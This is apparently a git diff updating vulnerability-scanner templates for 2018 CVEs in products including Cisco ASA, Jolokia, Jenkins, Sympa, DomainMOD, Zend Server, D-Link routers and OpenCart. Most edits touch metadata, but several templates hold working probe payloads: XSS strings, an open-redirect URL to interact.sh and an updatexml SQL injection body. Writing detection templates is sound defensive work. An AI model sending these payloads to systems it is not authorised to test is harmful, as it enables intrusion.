   description: Cisco RV132W ADSL2+ Wireless-N VPN Routers and Cisco RV134W VDSL2 Wireless-AC VPN Routers could allow an unauthenticated, remote attacker to view configuration parameters for an affected device via the web interface, which could lead to the disclosure of confidential information.
   reference:
     - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180207-rv13x_2
-    - http://www.securitytracker.com/id/1040345
-    - http://www.securityfocus.com/bid/102969
+    - http://web.archive.org/web/20211207054802/https://securitytracker.com/id/1040345
+    - http://web.archive.org/web/20210226170218/https://www.securityfocus.com/bid/102969
     - https://nvd.nist.gov/vuln/detail/CVE-2018-0127
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
diff --git a/cves/2018/CVE-2018-0296.yaml b/cves/2018/CVE-2018-0296.yaml
index cafdefd6c5..32101da097 100644
--- a/cves/2018/CVE-2018-0296.yaml
+++ b/cves/2018/CVE-2018-0296.yaml
@@ -1,24 +1,22 @@
 id: CVE-2018-0296
 
 info:
-  name: Cisco ASA path traversal vulnerability
+  name: Cisco ASA - Local File Inclusion
   author: organiccrap
   severity: high
-  description: 'A vulnerability in the web interface of the Cisco Adaptive Security Appliance (ASA) could allow an unauthenticated, remote attacker to cause an affected device to reload unexpectedly, resulting in
-    a denial of service (DoS) condition. It is also possible on certain software releases that the ASA will not reload, but an attacker could view sensitive system information without authentication by using directory
-    traversal techniques. The vulnerability is due to lack of proper input validation of the HTTP URL. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. An exploit
-    could allow the attacker to cause a DoS condition or unauthenticated disclosure of information. This vulnerability applies to IPv4 and IPv6 HTTP traffic. This vulnerability affects Cisco ASA Software and Cisco
-    Firepower Threat Defense (FTD) Software that is running on the following Cisco products: 3000 Series Industrial Security Appliance (ISA), ASA 1000V Cloud Firewall, ASA 5500 Series Adaptive Security Appliances,
-    ASA 5500-X Series Next-Generation Firewalls, ASA Services Module for Cisco Catalyst 6500 Series Switches and Cisco 7600 Series Routers, Adaptive Security Virtual Appliance (ASAv), Firepower 2100 Series Security
-    Appliance, Firepower 4100 Series Security Appliance, Firepower 9300 ASA Security Module, FTD Virtual (FTDv). Cisco Bug IDs: CSCvi16029.'
+  description: |
+    Cisco Adaptive Security Appliances (ASA) web interfaces could allow an unauthenticated, remote attacker to cause an affected device to reload unexpectedly, resulting in a denial of service (DoS) condition. It is also possible on certain software releases that the ASA will not reload, but an attacker could view sensitive system information without authentication by using directory traversal techniques. The vulnerability is due to lack of proper input validation of the HTTP URL. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. An exploit could allow the attacker to cause a DoS condition or unauthenticated disclosure of information. This vulnerability applies to IPv4 and IPv6 HTTP traffic. This vulnerability affects Cisco ASA Software and Cisco Firepower Threat Defense (FTD) Software that is running on the following Cisco products: 3000 Series Industrial Security Appliance (ISA), ASA 1000V Cloud Firewall, ASA 5500 Series Adaptive Security Appliances, ASA 5500-X Series Next-Generation Firewalls, ASA Services Module for Cisco Catalyst 6500 Series Switches and Cisco 7600 Series Routers, Adaptive Security Virtual Appliance (ASAv), Firepower 2100 Series Security Appliance, Firepower 4100 Series Security Appliance, Firepower 9300 ASA Security Module, FTD Virtual (FTDv). Cisco Bug IDs: CSCvi16029.
   reference:
     - https://github.com/yassineaboukir/CVE-2018-0296
+    - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180606-asaftd
+    - https://www.exploit-db.com/exploits/44956/
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-0296
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
     cvss-score: 7.5
     cve-id: CVE-2018-0296
     cwe-id: CWE-22
-  tags: cve,cve2018,cisco,lfi,traversal
+  tags: edb,cve,cve2018,cisco,lfi,traversal,asa,kev
 
 requests:
   - method: GET
@@ -30,10 +28,12 @@ requests:
     matchers-condition: and
     matchers:
       - type: word
+        part: body
         words:
           - "///sessions"
-        part: body
 
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/06/19
diff --git a/cves/2018/CVE-2018-1000129.yaml b/cves/2018/CVE-2018-1000129.yaml
index fc44d82269..c457ea6f10 100644
--- a/cves/2018/CVE-2018-1000129.yaml
+++ b/cves/2018/CVE-2018-1000129.yaml
@@ -1,15 +1,17 @@
 id: CVE-2018-1000129
 
 info:
-  name: Jolokia XSS
-  author: mavericknerd,0h1in9e
+  name: Jolokia 1.3.7 - Cross-Site Scripting
+  author: mavericknerd,0h1in9e,daffainfo
   severity: medium
-  description: An XSS vulnerability exists in the Jolokia agent version 1.3.7 in the HTTP servlet that allows an attacker to execute malicious javascript in the victim's browser.
+  description: |
+    Jolokia 1.3.7 is vulnerable to cross-site scripting in the HTTP servlet and allows an attacker to execute malicious JavaScript in the victim's browser.
   reference:
     - https://jolokia.org/#Security_fixes_with_1.5.0
     - https://github.com/rhuss/jolokia/commit/5895d5c137c335e6b473e9dcb9baf748851bbc5f#diff-f19898247eddb55de6400489bff748ad
-    - https://access.redhat.com/errata/RHSA-2018:2669
-    - https://access.redhat.com/errata/RHSA-2018:3817
+    - https://blog.gdssecurity.com/labs/2018/4/18/jolokia-vulnerabilities-rce-xss.html
+    - https://blog.it-securityguard.com/how-i-made-more-than-30k-with-jolokia-cves/
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-1000129
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -20,18 +22,28 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/jolokia/read<svg onload=alert(document.domain)>?mimeType=text/html"
-      - "{{BaseURL}}/api/jolokia/read<svg onload=alert(document.domain)>?mimeType=text/html"
+      - "{{BaseURL}}/api/jolokia/read<svg%20onload=alert(document.domain)>?mimeType=text/html"
+      - "{{BaseURL}}/jolokia/read<svg%20onload=alert(document.domain)>?mimeType=text/html"
+
+    stop-at-first-match: true
     matchers-condition: and
     matchers:
+
+      - type: word
+        part: body
+        words:
+          - "<svg onload=alert(document.domain)>"
+          - "java.lang.IllegalArgumentException"
+          - "No type with name"
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
       - type: status
         status:
           - 200
-      - type: word
-        words:
-          - "<svg onload=alert(document.domain)>"
-        part: body
-      - type: word
-        words:
-          - "text/html"
-        part: header
\ No newline at end of file
+
+# Enhanced by mp on 2022/08/18
diff --git a/cves/2018/CVE-2018-1000130.yaml b/cves/2018/CVE-2018-1000130.yaml
index 8fe310b37c..84c14ecd43 100644
--- a/cves/2018/CVE-2018-1000130.yaml
+++ b/cves/2018/CVE-2018-1000130.yaml
@@ -1,13 +1,15 @@
 id: CVE-2018-1000130
 
 info:
-  name: Jolokia Agent Proxy JNDI Code Injection
+  name: Jolokia Agent - JNDI Code Injection
   author: milo2012
   severity: high
-  description: A JNDI Injection vulnerability exists in Jolokia agent in the proxy mode that allows a remote attacker to run arbitrary Java code on the server.
+  description: |
+          Jolokia agent is vulnerable to a JNDI injection vulnerability that allows a remote attacker to run arbitrary Java code on the server when the agent is in proxy mode.
   reference:
     - https://jolokia.org/#Security_fixes_with_1.5.0
     - https://access.redhat.com/errata/RHSA-2018:2669
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-1000130
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 8.1
@@ -34,10 +36,12 @@ requests:
     matchers-condition: and
     matchers:
       - type: word
+        part: body
         words:
           - "Failed to retrieve RMIServer stub: javax.naming.CommunicationException: 127.0.0.1:1389"
-        part: body
 
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/06/19
diff --git a/cves/2018/CVE-2018-1000533.yaml b/cves/2018/CVE-2018-1000533.yaml
index 4150363c2d..491d39117e 100644
--- a/cves/2018/CVE-2018-1000533.yaml
+++ b/cves/2018/CVE-2018-1000533.yaml
@@ -8,12 +8,14 @@ info:
   reference:
     - https://github.com/vulhub/vulhub/tree/master/gitlist/CVE-2018-1000533
     - https://nvd.nist.gov/vuln/detail/CVE-2018-1000533
+    - https://security.szurek.pl/exploit-bypass-php-escapeshellarg-escapeshellcmd.html
+    - https://github.com/klaussilveira/gitlist/commit/87b8c26b023c3fc37f0796b14bb13710f397b322
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2018-1000533
     cwe-id: CWE-20
-  tags: rce,git,cve,cve2018,gitlist
+  tags: git,cve,cve2018,gitlist,vulhub,rce
 
 requests:
   - raw:
diff --git a/cves/2018/CVE-2018-1000600.yaml b/cves/2018/CVE-2018-1000600.yaml
index aa58c8b7ad..ec989d54d3 100644
--- a/cves/2018/CVE-2018-1000600.yaml
+++ b/cves/2018/CVE-2018-1000600.yaml
@@ -1,20 +1,22 @@
 id: CVE-2018-1000600
 
 info:
-  name: Pre-auth Fully-responded SSRF
+  name: Jenkins GitHub Plugin <=1.29.1 - Server-Side Request Forgery
   author: geeknik
   severity: high
-  description: A exposure of sensitive information vulnerability exists in Jenkins GitHub Plugin 1.29.1 and earlier in GitHubTokenCredentialsCreator.java that allows attackers to an attacker-specified URL using attacker-specified
-    credentials IDs obtained through another method, capturing credentials stored in Jenkins.
+  description: |
+        Jenkins GitHub Plugin 1.29.1 and earlier is susceptible to server-side request forgery via GitHubTokenCredentialsCreator.java, which allows attackers to leverage attacker-specified credentials IDs obtained through another method and capture the credentials stored in Jenkins.
   reference:
     - https://www.jenkins.io/security/advisory/2018-06-25/#SECURITY-915
     - https://devco.re/blog/2019/01/16/hacking-Jenkins-part1-play-with-dynamic-routing/
+    - https://jenkins.io/security/advisory/2018-06-25/#SECURITY-915
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-1000600
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
     cvss-score: 8.8
     cve-id: CVE-2018-1000600
     cwe-id: CWE-200
-  tags: cve,cve2018,jenkins,ssrf,oast
+  tags: cve,cve2018,jenkins,ssrf,oast,github
 
 requests:
   - method: GET
@@ -25,4 +27,6 @@ requests:
       - type: word
         part: interactsh_protocol # Confirms the HTTP Interaction
         words:
-          - "http"
\ No newline at end of file
+          - "http"
+
+# Enhanced by mp on 2022/06/19
diff --git a/cves/2018/CVE-2018-1000671.yaml b/cves/2018/CVE-2018-1000671.yaml
new file mode 100644
index 0000000000..99c741e6b3
--- /dev/null
+++ b/cves/2018/CVE-2018-1000671.yaml
@@ -0,0 +1,34 @@
+id: CVE-2018-1000671
+
+info:
+  name: Sympa version =>6.2.16 - Cross-Site Scripting
+  author: 0x_Akoko
+  severity: medium
+  description: Sympa version 6.2.16 and later contains a URL Redirection to Untrusted Site vulnerability in the referer parameter of the wwsympa fcgi login action that can result in open redirection and reflected cross-site scripting via data URIs.
+  reference:
+    - https://github.com/sympa-community/sympa/issues/268
+    - https://www.cvedetails.com/cve/CVE-2018-1000671
+    - https://vuldb.com/?id.123670
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-1000671
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2018-1000671
+    cwe-id: CWE-601
+  metadata:
+    shodan-query: http.html:"sympa"
+    verified: "true"
+  tags: cve,cve2018,redirect,sympa,debian
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/sympa?referer=http://interact.sh&passwd=&previous_action=&action=login&action_login=&previous_list=&list=&email='
+
+    matchers:
+      - type: regex
+        part: header
+        regex:
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
+
+# Enhanced by mp on 2022/08/18
diff --git a/cves/2018/CVE-2018-1000856.yaml b/cves/2018/CVE-2018-1000856.yaml
new file mode 100644
index 0000000000..f4f667730e
--- /dev/null
+++ b/cves/2018/CVE-2018-1000856.yaml
@@ -0,0 +1,61 @@
+id: CVE-2018-1000856
+
+info:
+  name: DomainMOD 4.11.01 - Cross-Site Scripting
+  author: arafatansari
+  severity: medium
+  description: |
+    DomainMOD 4.11.01 is vulnerable to cross-site scripting via the segments/add.php Segment Name field.
+  reference:
+    - https://github.com/domainmod/domainmod/issues/80
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-1000856
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 4.8
+    cve-id: CVE-2018-1000856
+    cwe-id: CWE-79
+  metadata:
+    verified: "true"
+  tags: cve,cve2018,domainmod,xss,authenticated
+
+requests:
+  - raw:
+
+      - |
+        POST / HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        new_username={{username}}&new_password={{password}}
+      - |
+        POST /segments/add.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        new_name=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&raw_domain_list=test.com&new_description=test&new_notes=test
+
+      - |
+        GET /segments/ HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+    cookie-reuse: true
+    redirects: true
+    max-redirects: 3
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<script>alert(1)</script></a>"
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/08/18
diff --git a/cves/2018/CVE-2018-1000861.yaml b/cves/2018/CVE-2018-1000861.yaml
index 8194ae8495..8cc0cd05bf 100644
--- a/cves/2018/CVE-2018-1000861.yaml
+++ b/cves/2018/CVE-2018-1000861.yaml
@@ -8,12 +8,14 @@ info:
   reference:
     - https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2018-1000861
     - https://nvd.nist.gov/vuln/detail/CVE-2018-1000861
+    - https://jenkins.io/security/advisory/2018-12-05/#SECURITY-595
+    - http://web.archive.org/web/20210421212616/https://www.securityfocus.com/bid/106176
   classification:
-    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2018-1000861
     cwe-id: CWE-502
-  tags: cve,cve2018,jenkin,rce,jenkins
+  tags: kev,vulhub,cve,cve2018,jenkin,rce,jenkins
 
 requests:
   - method: GET
diff --git a/cves/2018/CVE-2018-10093.yaml b/cves/2018/CVE-2018-10093.yaml
index 8cd5d56c58..91998154bb 100644
--- a/cves/2018/CVE-2018-10093.yaml
+++ b/cves/2018/CVE-2018-10093.yaml
@@ -1,19 +1,22 @@
 id: CVE-2018-10093
 
 info:
-  name: AudioCode 400HD - RCE
+  name: AudioCode 420HD - Remote Code Execution
   author: wisnupramoedya
   severity: high
-  description: AudioCodes IP phone 420HD devices using firmware version 2.2.12.126 allow Remote Code Execution.
+  description: |
+    AudioCodes IP phone 420HD devices using firmware version 2.2.12.126 allow remote code execution.
   reference:
     - https://www.exploit-db.com/exploits/46164
     - https://nvd.nist.gov/vuln/detail/CVE-2018-10093
+    - https://www.exploit-db.com/exploits/46164/
+    - http://seclists.org/fulldisclosure/2019/Jan/38
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 8.8
     cve-id: CVE-2018-10093
     cwe-id: CWE-862
-  tags: cve,cve2018,rce,iot
+  tags: cve,cve2018,rce,iot,audiocode,edb,seclists
 
 requests:
   - method: GET
@@ -30,3 +33,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/06/19
diff --git a/cves/2018/CVE-2018-10095.yaml b/cves/2018/CVE-2018-10095.yaml
index 5d957e52aa..5ee13d9336 100644
--- a/cves/2018/CVE-2018-10095.yaml
+++ b/cves/2018/CVE-2018-10095.yaml
@@ -1,12 +1,15 @@
 id: CVE-2018-10095
 
 info:
-  name: Dolibarr before 7.0.2 allows XSS.
+  name: Dolibarr <7.0.2 - Cross-Site Scripting
   author: pikpikcu
   severity: medium
   description: |
-    Cross-site scripting (XSS) vulnerability in Dolibarr before 7.0.2 allows remote attackers to inject arbitrary web script or HTML via the foruserlogin parameter to adherents/cartes/carte.php.
+    Dolibarr before 7.0.2  is vulnerable to cross-site scripting and allows remote attackers to inject arbitrary web script or HTML via the foruserlogin parameter to adherents/cartes/carte.php.
   reference:
+    - https://sysdream.com/news/lab/2018-05-21-cve-2018-10095-dolibarr-xss-injection-vulnerability/
+    - https://github.com/Dolibarr/dolibarr/commit/1dc466e1fb687cfe647de4af891720419823ed56
+    - https://github.com/Dolibarr/dolibarr/blob/7.0.2/ChangeLog
     - https://nvd.nist.gov/vuln/detail/CVE-2018-10095
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
@@ -35,3 +38,5 @@ requests:
         part: header
         words:
           - text/html
+
+# Enhanced by mp on 2022/08/18
diff --git a/cves/2018/CVE-2018-10141.yaml b/cves/2018/CVE-2018-10141.yaml
index 3ad04fd6fa..1b0b5fbe7e 100644
--- a/cves/2018/CVE-2018-10141.yaml
+++ b/cves/2018/CVE-2018-10141.yaml
@@ -1,11 +1,12 @@
 id: CVE-2018-10141
 
 info:
-  name: GlobalProtect Login page XSS
+  name: Palo Alto Networks PAN-OS GlobalProtect <8.1.4 - Cross-Site Scripting
   author: dhiyaneshDk
   severity: medium
-  description: GlobalProtect Portal Login page in Palo Alto Networks PAN-OS before 8.1.4 allows an unauthenticated attacker to inject arbitrary JavaScript or HTML.
+  description: Palo Alto Networks PAN-OS before 8.1.4 GlobalProtect Portal Login page allows an unauthenticated attacker to inject arbitrary JavaScript or HTML, making it vulnerable to cross-site scripting.
   reference:
+    - https://security.paloaltonetworks.com/CVE-2018-10141
     - https://nvd.nist.gov/vuln/detail/CVE-2018-10141
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
@@ -34,3 +35,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/18
diff --git a/cves/2018/CVE-2018-10201.yaml b/cves/2018/CVE-2018-10201.yaml
index 7b707ae9a7..9cd2c826a6 100644
--- a/cves/2018/CVE-2018-10201.yaml
+++ b/cves/2018/CVE-2018-10201.yaml
@@ -8,12 +8,14 @@ info:
   reference:
     - https://packetstormsecurity.com/files/147303/Ncomputing-vSPace-Pro-10-11-Directory-Traversal.html
     - https://www.cvedetails.com/cve/CVE-2018-10201
+    - http://www.kwell.net/kwell_blog/?p=5199
+    - https://www.kwell.net/kwell/index.php?option=com_newsfeeds&view=newsfeed&id=15&Itemid=173&lang=es
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2018-10201
     cwe-id: CWE-22
-  tags: cve,cve2018,ncomputing,lfi
+  tags: cve2018,ncomputing,lfi,packetstorm,cve
 
 requests:
   - method: GET
diff --git a/cves/2018/CVE-2018-10230.yaml b/cves/2018/CVE-2018-10230.yaml
new file mode 100644
index 0000000000..9d1ac7b5e4
--- /dev/null
+++ b/cves/2018/CVE-2018-10230.yaml
@@ -0,0 +1,43 @@
+id: CVE-2018-10230
+
+info:
+  name: Zend Server <9.13 - Cross-Site Scripting
+  author: marcos_iaf
+  severity: medium
+  description: |
+    Zend Server before version 9.13 is vulnerable to cross-site scripting via the debug_host parameter.
+  reference:
+    - https://www.synacktiv.com/ressources/zend_server_9_1_3_xss.pdf
+    - https://www.zend.com/en/products/server/release-notes
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-10230
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2018-10230
+    cwe-id: CWE-79
+  tags: cve,cve2018,xss,zend
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/index.php?debug_host=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&start_debug=1"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "</script><script>alert(document.domain)</script>"
+          - "is not allowed to open debug sessions"
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/08/18
diff --git a/cves/2018/CVE-2018-10562.yaml b/cves/2018/CVE-2018-10562.yaml
index b66f95704a..fe4ea6bae0 100644
--- a/cves/2018/CVE-2018-10562.yaml
+++ b/cves/2018/CVE-2018-10562.yaml
@@ -4,18 +4,18 @@ info:
   name: Dasan GPON Devices - Remote Code Execution
   author: gy741
   severity: critical
-  description: Dasan GPON home routers are susceptible to command injection which can occur via the dest_host parameter in a diag_action=ping request to a GponForm/diag_Form URI. Because the router saves ping
-    results in /tmp and transmits them to the user when the user revisits /diag.html, it's quite simple to execute commands and retrieve their output.
+  description: Dasan GPON home routers are susceptible to command injection which can occur via the dest_host parameter in a diag_action=ping request to a GponForm/diag_Form URI. Because the router saves ping results in /tmp and transmits them to the user when the user revisits /diag.html, it's quite simple to execute commands and retrieve their output.
   reference:
     - https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router
     - https://github.com/f3d0x0/GPON/blob/master/gpon_rce.py
     - https://nvd.nist.gov/vuln/detail/CVE-2018-10562
+    - https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router/
   classification:
-    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2018-10562
     cwe-id: CWE-78
-  tags: cve,cve2018,dasan,gpon,rce,oast
+  tags: cve,cve2018,dasan,gpon,rce,oast,kev
 
 requests:
   - raw:
diff --git a/cves/2018/CVE-2018-10822.yaml b/cves/2018/CVE-2018-10822.yaml
index 32eabe5d4d..540bebad4b 100644
--- a/cves/2018/CVE-2018-10822.yaml
+++ b/cves/2018/CVE-2018-10822.yaml
@@ -1,20 +1,21 @@
 id: CVE-2018-10822
 
 info:
-  name: D-Link Routers - Directory Traversal
+  name: D-Link Routers - Local File Inclusion
   author: daffainfo
   severity: high
-  description: Directory traversal vulnerability in the web interface on D-Link routers DWR-116 through 1.06, DIR-140L through 1.02, DIR-640L through 1.02,DWR-512 through 2.02,DWR-712 through 2.02,DWR-912 through
-    2.02, DWR-921 through 2.02, DWR-111 through 1.01, and probably others with the same type of firmware allows remote attackers to read arbitrary files via a /.. or // after "GET /uir" in an HTTP request.
+  description: D-Link routers DWR-116 through 1.06, DIR-140L through 1.02, DIR-640L through 1.02,DWR-512 through 2.02,DWR-712 through 2.02,DWR-912 through 2.02, DWR-921 through 2.02, DWR-111 through 1.01, and probably others with the same type of firmware allows remote attackers to read arbitrary files via a /.. or // after "GET /uir" in an HTTP request to the web interface.
   reference:
     - https://www.exploit-db.com/exploits/45678
+    - http://sploit.tech/2018/10/12/D-Link.html
     - https://nvd.nist.gov/vuln/detail/CVE-2018-10822
+    - https://seclists.org/fulldisclosure/2018/Oct/36
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2018-10822
     cwe-id: CWE-22
-  tags: cve,cve2018,lfi,router,dlink
+  tags: dlink,edb,seclists,cve,cve2018,lfi,router
 
 requests:
   - method: GET
@@ -31,3 +32,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/06/19
diff --git a/cves/2018/CVE-2018-10823.yaml b/cves/2018/CVE-2018-10823.yaml
index 0569e9c669..cc30f6ea5a 100644
--- a/cves/2018/CVE-2018-10823.yaml
+++ b/cves/2018/CVE-2018-10823.yaml
@@ -1,20 +1,22 @@
 id: CVE-2018-10823
 
 info:
-  name: D-Link Routers - Command Injection
+  name: D-Link Routers - Remote Command Injection
   author: wisnupramoedya
   severity: high
-  description: An issue was discovered on D-Link DWR-116 through 1.06, DWR-512 through 2.02, DWR-712 through 2.02, DWR-912 through 2.02, DWR-921 through 2.02, and DWR-111 through 1.01 devices. An authenticated attacker
-    may execute arbitrary code by injecting the shell command into the chkisg.htm page Sip parameter. This allows for full control over the device internals.
+  description: |
+    D-Link DWR-116 through 1.06, DWR-512 through 2.02, DWR-712 through 2.02, DWR-912 through 2.02, DWR-921 through 2.02, and DWR-111 through 1.01 device may allow an authenticated attacker to execute arbitrary code by injecting the shell command into the chkisg.htm page Sip parameter. This allows for full control over the device internals.
   reference:
     - https://www.exploit-db.com/exploits/45676
     - https://nvd.nist.gov/vuln/detail/CVE-2018-10823
+    - https://seclists.org/fulldisclosure/2018/Oct/36
+    - http://sploit.tech/2018/10/12/D-Link.html
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 8.8
     cve-id: CVE-2018-10823
     cwe-id: CWE-78
-  tags: cve,cve2018,rce,iot,dlink,router
+  tags: cve2018,rce,iot,dlink,router,edb,seclists,cve
 
 requests:
   - method: GET
@@ -31,3 +33,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/06/19
diff --git a/cves/2018/CVE-2018-10956.yaml b/cves/2018/CVE-2018-10956.yaml
index c193497fd8..1de95f1385 100644
--- a/cves/2018/CVE-2018-10956.yaml
+++ b/cves/2018/CVE-2018-10956.yaml
@@ -1,22 +1,25 @@
 id: CVE-2018-10956
 
 info:
-  name: IPConfigure Orchid Core VMS 2.0.5 - Unauthenticated Directory Traversal.
+  name: IPConfigure Orchid Core VMS 2.0.5 - Local File Inclusion
   author: 0x_Akoko
   severity: high
-  description: IPConfigure Orchid Core VMS 2.0.5 allows Directory Traversal.
+  description: |
+    IPConfigure Orchid Core VMS 2.0.5 is susceptible to local file inclusion.
   reference:
     - https://labs.nettitude.com/blog/cve-2018-10956-unauthenticated-privileged-directory-traversal-in-ipconfigure-orchid-core-vms/
     - https://github.com/nettitude/metasploit-modules/blob/master/orchid_core_vms_directory_traversal.rb
     - https://www.cvedetails.com/cve/CVE-2018-10956
+    - https://www.exploit-db.com/exploits/44916/
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-10956
   classification:
-    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2018-10956
     cwe-id: CWE-22
   metadata:
     shodan-query: http.title:"Orchid Core VMS"
-  tags: cve,cve2018,orchid,vms,lfi
+  tags: cve,cve2018,orchid,vms,lfi,edb
 
 requests:
   - method: GET
@@ -32,3 +35,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/06/19
diff --git a/cves/2018/CVE-2018-11231.yaml b/cves/2018/CVE-2018-11231.yaml
index b6ea184ff6..07cc95c8dc 100644
--- a/cves/2018/CVE-2018-11231.yaml
+++ b/cves/2018/CVE-2018-11231.yaml
@@ -1,19 +1,23 @@
 id: CVE-2018-11231
 
 info:
-  name: Opencart Divido plugin - Sql Injection
+  name: Opencart Divido - Sql Injection
   author: ritikchaddha
   severity: high
+  description: |
+    OpenCart Divido plugin is susceptible to SQL injection
   reference:
     - http://foreversong.cn/archives/1183
     - https://nvd.nist.gov/vuln/detail/CVE-2018-11231
-  tags: opencart,sqli,cve,cve2018
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 8.10
     cve-id: CVE-2018-11231
     cwe-id: CWE-89
-  description: "In the Divido plugin for OpenCart, there is SQL injection. Attackers can use SQL injection to get some confidential information."
+  tags: cve,cve2018,opencart,sqli
+
+variables:
+  num: "999999999"
 
 requests:
   - raw:
@@ -21,17 +25,20 @@ requests:
         POST /upload/index.php?route=extension/payment/divido/update HTTP/1.1
         Host: {{Hostname}}
 
-        {"metadata":{"order_id":"1 and updatexml(1,concat(0x7e,(SELECT md5(202072102)),0x7e),1)"},"status":2}
+        {"metadata":{"order_id":"1 and updatexml(1,concat(0x7e,(SELECT md5({{num}})),0x7e),1)"},"status":2}
 
     redirects: true
     max-redirects: 2
     matchers-condition: and
     matchers:
+
       - type: word
         part: body
         words:
-          - "6f7c6dcbc380aac3bcba1f9fccec991e"
+          - '{{md5({{num}})}}'
 
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/06/19
diff --git a/cves/2018/CVE-2018-11409.yaml b/cves/2018/CVE-2018-11409.yaml
index 897a22b12c..b0e5756e8a 100644
--- a/cves/2018/CVE-2018-11409.yaml
+++ b/cves/2018/CVE-2018-11409.yaml
@@ -7,12 +7,15 @@ info:
   description: Splunk through 7.0.1 allows information disclosure by appending __raw/services/server/info/server-info?output_mode=json to a query, as demonstrated by discovering a license key.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2018-11409
+    - https://github.com/kofa2002/splunk
+    - https://www.exploit-db.com/exploits/44865/
